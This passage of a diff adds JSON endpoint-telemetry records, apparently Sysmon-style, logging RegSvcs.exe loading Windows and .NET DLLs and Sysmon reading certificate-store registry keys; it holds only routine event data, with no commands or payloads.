+ "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\SysWOW64\\kernel32.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", 
+ "registry_value": "Certificates", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "RegSvcs.exe", + "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570870740000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "wow64cpu.dll", + "image_path": "C:\\Windows\\System32\\wow64cpu.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "mscoree.dll", + "image_path": 
"C:\\Windows\\SysWOW64\\mscoree.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\SysWOW64\\kernel32.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\SysWOW64\\KernelBase.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\SysWOW64\\advapi32.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\SysWOW64\\msvcrt.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570870900000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\SysWOW64\\sechost.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570870900000, + "unique_pid": 
"{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\SysWOW64\\rpcrt4.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871050000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "sspicli.dll", + "image_path": "C:\\Windows\\SysWOW64\\sspicli.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871050000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "cryptbase.dll", + "image_path": "C:\\Windows\\SysWOW64\\cryptbase.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871050000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\SysWOW64\\bcryptprimitives.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871050000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "mscoreei.dll", + "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871050000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\SysWOW64\\shlwapi.dll", + "pid": 1976, + "process_name": 
"RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871050000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\SysWOW64\\combase.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871050000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\SysWOW64\\ucrtbase.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871050000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\SysWOW64\\gdi32.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871050000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\SysWOW64\\gdi32full.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871050000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\SysWOW64\\msvcp_win.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871050000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": 
"user32.dll", + "image_path": "C:\\Windows\\SysWOW64\\user32.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871050000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\SysWOW64\\win32u.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871050000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\SysWOW64\\imm32.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871050000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\SysWOW64\\kernel.appcore.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871050000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "version.dll", + "image_path": "C:\\Windows\\SysWOW64\\version.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871050000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "clr.dll", + "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 
131883570871050000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcr120_clr0400.dll", + "image_path": "C:\\Windows\\SysWOW64\\msvcr120_clr0400.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871210000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "registry", + "pid": 4, + "process_name": "System", + "process_path": "System", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\CIT\\Module\\Microsoft.NET/Framework/v4.0.30319", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\CIT\\Module\\Microsoft.NET/Framework/v4.0.30319/clr.dll", + "registry_value": "clr.dll", + "timestamp": 131883570871210000, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" + }, + { + "event_type": "registry", + "pid": 4, + "process_name": "System", + "process_path": "System", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\CIT\\Module\\Microsoft.NET/Framework/v4.0.30319/clr.dll\\\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework\\v4.0.30319", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\CIT\\Module\\Microsoft.NET/Framework/v4.0.30319/clr.dll\\\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "registry_value": "RegSvcs.exe", + "timestamp": 131883570871210000, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" + }, + { + "event_type": "image_load", + "image_name": "mscorlib.ni.dll", + "image_path": "C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\6715dc4d04e35f16d482900c355325e9\\mscorlib.ni.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + 
"timestamp": 131883570871210000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\SysWOW64\\ole32.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871210000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "clrjit.dll", + "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871210000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\SysWOW64\\oleaut32.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871210000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "System.EnterpriseServices.dll", + "image_path": "C:\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.EnterpriseServices\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\System.EnterpriseServices.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "System.EnterpriseServices.dll", + "image_path": "C:\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.EnterpriseServices\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\System.EnterpriseServices.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + 
"timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 